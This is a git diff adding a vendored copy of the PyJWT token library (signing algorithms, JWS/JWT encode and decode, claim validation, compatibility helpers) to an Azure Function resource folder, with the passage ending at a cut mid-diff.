diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/algorithms.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/algorithms.cpython-39.pyc
new file mode 100644
index 0000000..0a8db72
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/algorithms.cpython-39.pyc differ
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/api_jws.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/api_jws.cpython-39.pyc
new file mode 100644
index 0000000..226844e
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/api_jws.cpython-39.pyc differ
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/api_jwt.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/api_jwt.cpython-39.pyc
new file mode 100644
index 0000000..6096a3d
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/api_jwt.cpython-39.pyc differ
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/compat.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/compat.cpython-39.pyc
new file mode 100644
index 0000000..e81b5c6
Binary files
/dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/compat.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/exceptions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/exceptions.cpython-39.pyc new file mode 100644 index 0000000..ac764d6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/exceptions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/help.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/help.cpython-39.pyc new file mode 100644 index 0000000..0ac9e37 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/help.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/utils.cpython-39.pyc new file mode 100644 index 0000000..24c45f3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/algorithms.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/algorithms.py new file mode 100644 index 0000000..8355961 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/algorithms.py @@ -0,0 +1,403 @@ +import hashlib +import hmac +import json + + +from .compat import constant_time_compare, string_types +from .exceptions import InvalidKeyError +from .utils import ( + base64url_decode, base64url_encode, der_to_raw_signature, + force_bytes, force_unicode, from_base64url_uint, raw_to_der_signature, + to_base64url_uint +) + +try: + from cryptography.hazmat.primitives import hashes + from cryptography.hazmat.primitives.serialization import ( + load_pem_private_key, load_pem_public_key, load_ssh_public_key + ) + from cryptography.hazmat.primitives.asymmetric.rsa import ( + RSAPrivateKey, RSAPublicKey, RSAPrivateNumbers, RSAPublicNumbers, + rsa_recover_prime_factors, rsa_crt_dmp1, rsa_crt_dmq1, rsa_crt_iqmp + ) + from cryptography.hazmat.primitives.asymmetric.ec import ( + EllipticCurvePrivateKey, EllipticCurvePublicKey + ) + from cryptography.hazmat.primitives.asymmetric import ec, padding + from cryptography.hazmat.backends import default_backend + from cryptography.exceptions import InvalidSignature + + has_crypto = True +except ImportError: + has_crypto = False + +requires_cryptography = set(['RS256', 'RS384', 'RS512', 'ES256', 'ES384', + 'ES521', 'ES512', 'PS256', 'PS384', 'PS512']) + + +def get_default_algorithms(): + """ + Returns the algorithms that are implemented by the library. 
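+    Only the 'none' and HMAC ('HS*') entries are available unless the
+    optional cryptography package is installed.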
+ """ + default_algorithms = { + 'none': NoneAlgorithm(), + 'HS256': HMACAlgorithm(HMACAlgorithm.SHA256), + 'HS384': HMACAlgorithm(HMACAlgorithm.SHA384), + 'HS512': HMACAlgorithm(HMACAlgorithm.SHA512) + } + + if has_crypto: + default_algorithms.update({ + 'RS256': RSAAlgorithm(RSAAlgorithm.SHA256), + 'RS384': RSAAlgorithm(RSAAlgorithm.SHA384), + 'RS512': RSAAlgorithm(RSAAlgorithm.SHA512), + 'ES256': ECAlgorithm(ECAlgorithm.SHA256), + 'ES384': ECAlgorithm(ECAlgorithm.SHA384), + 'ES521': ECAlgorithm(ECAlgorithm.SHA512), + 'ES512': ECAlgorithm(ECAlgorithm.SHA512), # Backward compat for #219 fix + 'PS256': RSAPSSAlgorithm(RSAPSSAlgorithm.SHA256), + 'PS384': RSAPSSAlgorithm(RSAPSSAlgorithm.SHA384), + 'PS512': RSAPSSAlgorithm(RSAPSSAlgorithm.SHA512) + }) + + return default_algorithms + + +class Algorithm(object): + """ + The interface for an algorithm used to sign and verify tokens. + """ + def prepare_key(self, key): + """ + Performs necessary validation and conversions on the key and returns + the key value in the proper format for sign() and verify(). + """ + raise NotImplementedError + + def sign(self, msg, key): + """ + Returns a digital signature for the specified message + using the specified key value. + """ + raise NotImplementedError + + def verify(self, msg, key, sig): + """ + Verifies that the specified digital signature is valid + for the specified message and key values. + """ + raise NotImplementedError + + @staticmethod + def to_jwk(key_obj): + """ + Serializes a given RSA key into a JWK + """ + raise NotImplementedError + + @staticmethod + def from_jwk(jwk): + """ + Deserializes a given RSA key from JWK back into a PublicKey or PrivateKey object + """ + raise NotImplementedError + + +class NoneAlgorithm(Algorithm): + """ + Placeholder for use when no signing or verification + operations are required. + """ + def prepare_key(self, key): + if key == '': + key = None + + if key is not None: + raise InvalidKeyError('When alg = "none", key value must be None.') + + return key + + def sign(self, msg, key): + return b'' + + def verify(self, msg, key, sig): + return False + + +class HMACAlgorithm(Algorithm): + """ + Performs signing and verification operations using HMAC + and the specified hash function. + """ + SHA256 = hashlib.sha256 + SHA384 = hashlib.sha384 + SHA512 = hashlib.sha512 + + def __init__(self, hash_alg): + self.hash_alg = hash_alg + + def prepare_key(self, key): + key = force_bytes(key) + + invalid_strings = [ + b'-----BEGIN PUBLIC KEY-----', + b'-----BEGIN CERTIFICATE-----', + b'-----BEGIN RSA PUBLIC KEY-----', + b'ssh-rsa' + ] + + if any([string_value in key for string_value in invalid_strings]): + raise InvalidKeyError( + 'The specified key is an asymmetric key or x509 certificate and' + ' should not be used as an HMAC secret.') + + return key + + @staticmethod + def to_jwk(key_obj): + return json.dumps({ + 'k': force_unicode(base64url_encode(force_bytes(key_obj))), + 'kty': 'oct' + }) + + @staticmethod + def from_jwk(jwk): + obj = json.loads(jwk) + + if obj.get('kty') != 'oct': + raise InvalidKeyError('Not an HMAC key') + + return base64url_decode(obj['k']) + + def sign(self, msg, key): + return hmac.new(key, msg, self.hash_alg).digest() + + def verify(self, msg, key, sig): + return constant_time_compare(sig, self.sign(msg, key)) + + +if has_crypto: + + class RSAAlgorithm(Algorithm): + """ + Performs signing and verification operations using + RSASSA-PKCS-v1_5 and the specified hash function. 
+ """ + SHA256 = hashes.SHA256 + SHA384 = hashes.SHA384 + SHA512 = hashes.SHA512 + + def __init__(self, hash_alg): + self.hash_alg = hash_alg + + def prepare_key(self, key): + if isinstance(key, RSAPrivateKey) or \ + isinstance(key, RSAPublicKey): + return key + + if isinstance(key, string_types): + key = force_bytes(key) + + try: + if key.startswith(b'ssh-rsa'): + key = load_ssh_public_key(key, backend=default_backend()) + else: + key = load_pem_private_key(key, password=None, backend=default_backend()) + except ValueError: + key = load_pem_public_key(key, backend=default_backend()) + else: + raise TypeError('Expecting a PEM-formatted key.') + + return key + + @staticmethod + def to_jwk(key_obj): + obj = None + + if getattr(key_obj, 'private_numbers', None): + # Private key + numbers = key_obj.private_numbers() + + obj = { + 'kty': 'RSA', + 'key_ops': ['sign'], + 'n': force_unicode(to_base64url_uint(numbers.public_numbers.n)), + 'e': force_unicode(to_base64url_uint(numbers.public_numbers.e)), + 'd': force_unicode(to_base64url_uint(numbers.d)), + 'p': force_unicode(to_base64url_uint(numbers.p)), + 'q': force_unicode(to_base64url_uint(numbers.q)), + 'dp': force_unicode(to_base64url_uint(numbers.dmp1)), + 'dq': force_unicode(to_base64url_uint(numbers.dmq1)), + 'qi': force_unicode(to_base64url_uint(numbers.iqmp)) + } + + elif getattr(key_obj, 'verify', None): + # Public key + numbers = key_obj.public_numbers() + + obj = { + 'kty': 'RSA', + 'key_ops': ['verify'], + 'n': force_unicode(to_base64url_uint(numbers.n)), + 'e': force_unicode(to_base64url_uint(numbers.e)) + } + else: + raise InvalidKeyError('Not a public or private key') + + return json.dumps(obj) + + @staticmethod + def from_jwk(jwk): + try: + obj = json.loads(jwk) + except ValueError: + raise InvalidKeyError('Key is not valid JSON') + + if obj.get('kty') != 'RSA': + raise InvalidKeyError('Not an RSA key') + + if 'd' in obj and 'e' in obj and 'n' in obj: + # Private key + if 'oth' in obj: + raise InvalidKeyError('Unsupported RSA private key: > 2 primes not supported') + + other_props = ['p', 'q', 'dp', 'dq', 'qi'] + props_found = [prop in obj for prop in other_props] + any_props_found = any(props_found) + + if any_props_found and not all(props_found): + raise InvalidKeyError('RSA key must include all parameters if any are present besides d') + + public_numbers = RSAPublicNumbers( + from_base64url_uint(obj['e']), from_base64url_uint(obj['n']) + ) + + if any_props_found: + numbers = RSAPrivateNumbers( + d=from_base64url_uint(obj['d']), + p=from_base64url_uint(obj['p']), + q=from_base64url_uint(obj['q']), + dmp1=from_base64url_uint(obj['dp']), + dmq1=from_base64url_uint(obj['dq']), + iqmp=from_base64url_uint(obj['qi']), + public_numbers=public_numbers + ) + else: + d = from_base64url_uint(obj['d']) + p, q = rsa_recover_prime_factors( + public_numbers.n, d, public_numbers.e + ) + + numbers = RSAPrivateNumbers( + d=d, + p=p, + q=q, + dmp1=rsa_crt_dmp1(d, p), + dmq1=rsa_crt_dmq1(d, q), + iqmp=rsa_crt_iqmp(p, q), + public_numbers=public_numbers + ) + + return numbers.private_key(default_backend()) + elif 'n' in obj and 'e' in obj: + # Public key + numbers = RSAPublicNumbers( + from_base64url_uint(obj['e']), from_base64url_uint(obj['n']) + ) + + return numbers.public_key(default_backend()) + else: + raise InvalidKeyError('Not a public or private key') + + def sign(self, msg, key): + return key.sign(msg, padding.PKCS1v15(), self.hash_alg()) + + def verify(self, msg, key, sig): + try: + key.verify(sig, msg, padding.PKCS1v15(), self.hash_alg()) 
+ return True + except InvalidSignature: + return False + + class ECAlgorithm(Algorithm): + """ + Performs signing and verification operations using + ECDSA and the specified hash function + """ + SHA256 = hashes.SHA256 + SHA384 = hashes.SHA384 + SHA512 = hashes.SHA512 + + def __init__(self, hash_alg): + self.hash_alg = hash_alg + + def prepare_key(self, key): + if isinstance(key, EllipticCurvePrivateKey) or \ + isinstance(key, EllipticCurvePublicKey): + return key + + if isinstance(key, string_types): + key = force_bytes(key) + + # Attempt to load key. We don't know if it's + # a Signing Key or a Verifying Key, so we try + # the Verifying Key first. + try: + if key.startswith(b'ecdsa-sha2-'): + key = load_ssh_public_key(key, backend=default_backend()) + else: + key = load_pem_public_key(key, backend=default_backend()) + except ValueError: + key = load_pem_private_key(key, password=None, backend=default_backend()) + + else: + raise TypeError('Expecting a PEM-formatted key.') + + return key + + def sign(self, msg, key): + der_sig = key.sign(msg, ec.ECDSA(self.hash_alg())) + + return der_to_raw_signature(der_sig, key.curve) + + def verify(self, msg, key, sig): + try: + der_sig = raw_to_der_signature(sig, key.curve) + except ValueError: + return False + + try: + key.verify(der_sig, msg, ec.ECDSA(self.hash_alg())) + return True + except InvalidSignature: + return False + + class RSAPSSAlgorithm(RSAAlgorithm): + """ + Performs a signature using RSASSA-PSS with MGF1 + """ + + def sign(self, msg, key): + return key.sign( + msg, + padding.PSS( + mgf=padding.MGF1(self.hash_alg()), + salt_length=self.hash_alg.digest_size + ), + self.hash_alg() + ) + + def verify(self, msg, key, sig): + try: + key.verify( + sig, + msg, + padding.PSS( + mgf=padding.MGF1(self.hash_alg()), + salt_length=self.hash_alg.digest_size + ), + self.hash_alg() + ) + return True + except InvalidSignature: + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/api_jws.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/api_jws.py new file mode 100644 index 0000000..de068a7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/api_jws.py @@ -0,0 +1,242 @@ +import binascii +import json +import warnings +try: + # import required by mypy to perform type checking, not used for normal execution + from typing import Callable, Dict, List, Optional, Union # NOQA +except ImportError: + pass + +from .algorithms import ( + Algorithm, get_default_algorithms, has_crypto, requires_cryptography # NOQA +) +from .compat import Mapping, binary_type, string_types, text_type +from .exceptions import ( + DecodeError, InvalidAlgorithmError, InvalidSignatureError, + InvalidTokenError +) +from .utils import base64url_decode, base64url_encode, force_bytes, merge_dict + + +class PyJWS(object): + header_typ = 'JWT' + + def __init__(self, algorithms=None, options=None): + self._algorithms = get_default_algorithms() + self._valid_algs = (set(algorithms) if algorithms is not None + else set(self._algorithms)) + + # Remove algorithms that aren't on the whitelist + for key in list(self._algorithms.keys()): + if key not in self._valid_algs: + del self._algorithms[key] + + if not options: + options = {} + + self.options = merge_dict(self._get_default_options(), options) + + @staticmethod + def _get_default_options(): + return { + 'verify_signature': True + } + + def register_algorithm(self, alg_id, alg_obj): + """ + 
Registers a new Algorithm for use when creating and verifying tokens. + """ + if alg_id in self._algorithms: + raise ValueError('Algorithm already has a handler.') + + if not isinstance(alg_obj, Algorithm): + raise TypeError('Object is not of type `Algorithm`') + + self._algorithms[alg_id] = alg_obj + self._valid_algs.add(alg_id) + + def unregister_algorithm(self, alg_id): + """ + Unregisters an Algorithm for use when creating and verifying tokens + Throws KeyError if algorithm is not registered. + """ + if alg_id not in self._algorithms: + raise KeyError('The specified algorithm could not be removed' + ' because it is not registered.') + + del self._algorithms[alg_id] + self._valid_algs.remove(alg_id) + + def get_algorithms(self): + """ + Returns a list of supported values for the 'alg' parameter. + """ + return list(self._valid_algs) + + def encode(self, + payload, # type: Union[Dict, bytes] + key, # type: str + algorithm='HS256', # type: str + headers=None, # type: Optional[Dict] + json_encoder=None # type: Optional[Callable] + ): + segments = [] + + if algorithm is None: + algorithm = 'none' + + if algorithm not in self._valid_algs: + pass + + # Header + header = {'typ': self.header_typ, 'alg': algorithm} + + if headers: + self._validate_headers(headers) + header.update(headers) + + json_header = force_bytes( + json.dumps( + header, + separators=(',', ':'), + cls=json_encoder + ) + ) + + segments.append(base64url_encode(json_header)) + segments.append(base64url_encode(payload)) + + # Segments + signing_input = b'.'.join(segments) + try: + alg_obj = self._algorithms[algorithm] + key = alg_obj.prepare_key(key) + signature = alg_obj.sign(signing_input, key) + + except KeyError: + if not has_crypto and algorithm in requires_cryptography: + raise NotImplementedError( + "Algorithm '%s' could not be found. Do you have cryptography " + "installed?" % algorithm + ) + else: + raise NotImplementedError('Algorithm not supported') + + segments.append(base64url_encode(signature)) + + return b'.'.join(segments) + + def decode(self, + jwt, # type: str + key='', # type: str + verify=True, # type: bool + algorithms=None, # type: List[str] + options=None, # type: Dict + **kwargs): + + merged_options = merge_dict(self.options, options) + verify_signature = merged_options['verify_signature'] + + if verify_signature and not algorithms: + warnings.warn( + 'It is strongly recommended that you pass in a ' + + 'value for the "algorithms" argument when calling decode(). ' + + 'This argument will be mandatory in a future version.', + DeprecationWarning + ) + + payload, signing_input, header, signature = self._load(jwt) + + if not verify: + warnings.warn('The verify parameter is deprecated. ' + 'Please use verify_signature in options instead.', + DeprecationWarning, stacklevel=2) + elif verify_signature: + self._verify_signature(payload, signing_input, header, signature, + key, algorithms) + + return payload + + def get_unverified_header(self, jwt): + """Returns back the JWT header parameters as a dict() + + Note: The signature is not verified so the header parameters + should not be fully trusted until signature verification is complete + """ + headers = self._load(jwt)[2] + self._validate_headers(headers) + + return headers + + def _load(self, jwt): + if isinstance(jwt, text_type): + jwt = jwt.encode('utf-8') + + if not issubclass(type(jwt), binary_type): + raise DecodeError("Invalid token type. 
Token must be a {0}".format( + binary_type)) + + try: + signing_input, crypto_segment = jwt.rsplit(b'.', 1) + header_segment, payload_segment = signing_input.split(b'.', 1) + except ValueError: + raise DecodeError('Not enough segments') + + try: + header_data = base64url_decode(header_segment) + except (TypeError, binascii.Error): + raise DecodeError('Invalid header padding') + + try: + header = json.loads(header_data.decode('utf-8')) + except ValueError as e: + raise DecodeError('Invalid header string: %s' % e) + + if not isinstance(header, Mapping): + raise DecodeError('Invalid header string: must be a json object') + + try: + payload = base64url_decode(payload_segment) + except (TypeError, binascii.Error): + raise DecodeError('Invalid payload padding') + + try: + signature = base64url_decode(crypto_segment) + except (TypeError, binascii.Error): + raise DecodeError('Invalid crypto padding') + + return (payload, signing_input, header, signature) + + def _verify_signature(self, payload, signing_input, header, signature, + key='', algorithms=None): + + alg = header.get('alg') + + if algorithms is not None and alg not in algorithms: + raise InvalidAlgorithmError('The specified alg value is not allowed') + + try: + alg_obj = self._algorithms[alg] + key = alg_obj.prepare_key(key) + + if not alg_obj.verify(signing_input, key, signature): + raise InvalidSignatureError('Signature verification failed') + + except KeyError: + raise InvalidAlgorithmError('Algorithm not supported') + + def _validate_headers(self, headers): + if 'kid' in headers: + self._validate_kid(headers['kid']) + + def _validate_kid(self, kid): + if not isinstance(kid, string_types): + raise InvalidTokenError('Key ID header parameter must be a string') + + +_jws_global_obj = PyJWS() +encode = _jws_global_obj.encode +decode = _jws_global_obj.decode +register_algorithm = _jws_global_obj.register_algorithm +unregister_algorithm = _jws_global_obj.unregister_algorithm +get_unverified_header = _jws_global_obj.get_unverified_header diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/api_jwt.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/api_jwt.py new file mode 100644 index 0000000..67fdbf8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/api_jwt.py @@ -0,0 +1,222 @@ +import json +import warnings +from calendar import timegm +from datetime import datetime, timedelta +try: + # import required by mypy to perform type checking, not used for normal execution + from typing import Callable, Dict, List, Optional, Union # NOQA +except ImportError: + pass + +from .api_jws import PyJWS +from .algorithms import Algorithm, get_default_algorithms # NOQA +from .compat import Iterable, Mapping, string_types +from .exceptions import ( + DecodeError, ExpiredSignatureError, ImmatureSignatureError, + InvalidAudienceError, InvalidIssuedAtError, + InvalidIssuerError, MissingRequiredClaimError +) +from .utils import merge_dict + + +class PyJWT(PyJWS): + header_type = 'JWT' + + @staticmethod + def _get_default_options(): + # type: () -> Dict[str, bool] + return { + 'verify_signature': True, + 'verify_exp': True, + 'verify_nbf': True, + 'verify_iat': True, + 'verify_aud': True, + 'verify_iss': True, + 'require_exp': False, + 'require_iat': False, + 'require_nbf': False + } + + def encode(self, + payload, # type: Union[Dict, bytes] + key, # type: str + algorithm='HS256', # type: str + headers=None, # type: 
Optional[Dict] + json_encoder=None # type: Optional[Callable] + ): + # Check that we get a mapping + if not isinstance(payload, Mapping): + raise TypeError('Expecting a mapping object, as JWT only supports ' + 'JSON objects as payloads.') + + # Payload + for time_claim in ['exp', 'iat', 'nbf']: + # Convert datetime to a intDate value in known time-format claims + if isinstance(payload.get(time_claim), datetime): + payload[time_claim] = timegm(payload[time_claim].utctimetuple()) # type: ignore + + json_payload = json.dumps( + payload, + separators=(',', ':'), + cls=json_encoder + ).encode('utf-8') + + return super(PyJWT, self).encode( + json_payload, key, algorithm, headers, json_encoder + ) + + def decode(self, + jwt, # type: str + key='', # type: str + verify=True, # type: bool + algorithms=None, # type: List[str] + options=None, # type: Dict + **kwargs): + + if verify and not algorithms: + warnings.warn( + 'It is strongly recommended that you pass in a ' + + 'value for the "algorithms" argument when calling decode(). ' + + 'This argument will be mandatory in a future version.', + DeprecationWarning + ) + + payload, _, _, _ = self._load(jwt) + + if options is None: + options = {'verify_signature': verify} + else: + options.setdefault('verify_signature', verify) + + decoded = super(PyJWT, self).decode( + jwt, key=key, algorithms=algorithms, options=options, **kwargs + ) + + try: + payload = json.loads(decoded.decode('utf-8')) + except ValueError as e: + raise DecodeError('Invalid payload string: %s' % e) + if not isinstance(payload, Mapping): + raise DecodeError('Invalid payload string: must be a json object') + + if verify: + merged_options = merge_dict(self.options, options) + self._validate_claims(payload, merged_options, **kwargs) + + return payload + + def _validate_claims(self, payload, options, audience=None, issuer=None, + leeway=0, **kwargs): + + if 'verify_expiration' in kwargs: + options['verify_exp'] = kwargs.get('verify_expiration', True) + warnings.warn('The verify_expiration parameter is deprecated. 
' + 'Please use verify_exp in options instead.', + DeprecationWarning) + + if isinstance(leeway, timedelta): + leeway = leeway.total_seconds() + + if not isinstance(audience, (string_types, type(None), Iterable)): + raise TypeError('audience must be a string, iterable, or None') + + self._validate_required_claims(payload, options) + + now = timegm(datetime.utcnow().utctimetuple()) + + if 'iat' in payload and options.get('verify_iat'): + self._validate_iat(payload, now, leeway) + + if 'nbf' in payload and options.get('verify_nbf'): + self._validate_nbf(payload, now, leeway) + + if 'exp' in payload and options.get('verify_exp'): + self._validate_exp(payload, now, leeway) + + if options.get('verify_iss'): + self._validate_iss(payload, issuer) + + if options.get('verify_aud'): + self._validate_aud(payload, audience) + + def _validate_required_claims(self, payload, options): + if options.get('require_exp') and payload.get('exp') is None: + raise MissingRequiredClaimError('exp') + + if options.get('require_iat') and payload.get('iat') is None: + raise MissingRequiredClaimError('iat') + + if options.get('require_nbf') and payload.get('nbf') is None: + raise MissingRequiredClaimError('nbf') + + def _validate_iat(self, payload, now, leeway): + try: + int(payload['iat']) + except ValueError: + raise InvalidIssuedAtError('Issued At claim (iat) must be an integer.') + + def _validate_nbf(self, payload, now, leeway): + try: + nbf = int(payload['nbf']) + except ValueError: + raise DecodeError('Not Before claim (nbf) must be an integer.') + + if nbf > (now + leeway): + raise ImmatureSignatureError('The token is not yet valid (nbf)') + + def _validate_exp(self, payload, now, leeway): + try: + exp = int(payload['exp']) + except ValueError: + raise DecodeError('Expiration Time claim (exp) must be an' + ' integer.') + + if exp < (now - leeway): + raise ExpiredSignatureError('Signature has expired') + + def _validate_aud(self, payload, audience): + if audience is None and 'aud' not in payload: + return + + if audience is not None and 'aud' not in payload: + # Application specified an audience, but it could not be + # verified since the token does not contain a claim. 
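+            # For example, decode(token, key, audience='urn:me') ends up here
+            # when the token was issued without any 'aud' claim.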
+ raise MissingRequiredClaimError('aud') + + if audience is None and 'aud' in payload: + # Application did not specify an audience, but + # the token has the 'aud' claim + raise InvalidAudienceError('Invalid audience') + + audience_claims = payload['aud'] + + if isinstance(audience_claims, string_types): + audience_claims = [audience_claims] + if not isinstance(audience_claims, list): + raise InvalidAudienceError('Invalid claim format in token') + if any(not isinstance(c, string_types) for c in audience_claims): + raise InvalidAudienceError('Invalid claim format in token') + + if isinstance(audience, string_types): + audience = [audience] + + if not any(aud in audience_claims for aud in audience): + raise InvalidAudienceError('Invalid audience') + + def _validate_iss(self, payload, issuer): + if issuer is None: + return + + if 'iss' not in payload: + raise MissingRequiredClaimError('iss') + + if payload['iss'] != issuer: + raise InvalidIssuerError('Invalid issuer') + + +_jwt_global_obj = PyJWT() +encode = _jwt_global_obj.encode +decode = _jwt_global_obj.decode +register_algorithm = _jwt_global_obj.register_algorithm +unregister_algorithm = _jwt_global_obj.unregister_algorithm +get_unverified_header = _jwt_global_obj.get_unverified_header diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/compat.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/compat.py new file mode 100644 index 0000000..69d75ec --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/compat.py @@ -0,0 +1,68 @@ +""" +The `compat` module provides support for backwards compatibility with older +versions of python, and compatibility wrappers around optional packages. +""" +# flake8: noqa +import hmac +import struct +import sys + + +PY3 = sys.version_info[0] == 3 + + +if PY3: + text_type = str + binary_type = bytes +else: + text_type = unicode + binary_type = str + +string_types = (text_type, binary_type) + +try: + # Importing ABCs from collections will be removed in PY3.8 + from collections.abc import Iterable, Mapping +except ImportError: + from collections import Iterable, Mapping + +try: + constant_time_compare = hmac.compare_digest +except AttributeError: + # Fallback for Python < 2.7 + def constant_time_compare(val1, val2): + """ + Returns True if the two strings are equal, False otherwise. + + The time taken is independent of the number of characters that match. 
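+
+        For example, constant_time_compare('abc', 'abc') returns True and
+        constant_time_compare('abc', 'abd') returns False, with both calls
+        examining every character.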
+ """ + if len(val1) != len(val2): + return False + + result = 0 + + for x, y in zip(val1, val2): + result |= ord(x) ^ ord(y) + + return result == 0 + +# Use int.to_bytes if it exists (Python 3) +if getattr(int, 'to_bytes', None): + def bytes_from_int(val): + remaining = val + byte_length = 0 + + while remaining != 0: + remaining = remaining >> 8 + byte_length += 1 + + return val.to_bytes(byte_length, 'big', signed=False) +else: + def bytes_from_int(val): + buf = [] + while val: + val, remainder = divmod(val, 256) + buf.append(remainder) + + buf.reverse() + return struct.pack('%sB' % len(buf), *buf) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..80045f8 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..f00f3dc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/py_ecdsa.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/py_ecdsa.cpython-39.pyc new file mode 100644 index 0000000..37ac44f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/py_ecdsa.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/pycrypto.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/pycrypto.cpython-39.pyc new file mode 100644 index 0000000..f976f00 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/pycrypto.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/py_ecdsa.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/py_ecdsa.py new file mode 100644 index 0000000..9350269 --- /dev/null +++ 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/py_ecdsa.py @@ -0,0 +1,60 @@ +# Note: This file is named py_ecdsa.py because import behavior in Python 2 +# would cause ecdsa.py to squash the ecdsa library that it depends upon. + +import hashlib + +import ecdsa + +from jwt.algorithms import Algorithm +from jwt.compat import string_types, text_type + + +class ECAlgorithm(Algorithm): + """ + Performs signing and verification operations using + ECDSA and the specified hash function + + This class requires the ecdsa package to be installed. + + This is based off of the implementation in PyJWT 0.3.2 + """ + SHA256 = hashlib.sha256 + SHA384 = hashlib.sha384 + SHA512 = hashlib.sha512 + + def __init__(self, hash_alg): + self.hash_alg = hash_alg + + def prepare_key(self, key): + + if isinstance(key, ecdsa.SigningKey) or \ + isinstance(key, ecdsa.VerifyingKey): + return key + + if isinstance(key, string_types): + if isinstance(key, text_type): + key = key.encode('utf-8') + + # Attempt to load key. We don't know if it's + # a Signing Key or a Verifying Key, so we try + # the Verifying Key first. + try: + key = ecdsa.VerifyingKey.from_pem(key) + except ecdsa.der.UnexpectedDER: + key = ecdsa.SigningKey.from_pem(key) + + else: + raise TypeError('Expecting a PEM-formatted key.') + + return key + + def sign(self, msg, key): + return key.sign(msg, hashfunc=self.hash_alg, + sigencode=ecdsa.util.sigencode_string) + + def verify(self, msg, key, sig): + try: + return key.verify(sig, msg, hashfunc=self.hash_alg, + sigdecode=ecdsa.util.sigdecode_string) + except AssertionError: + return False diff --git 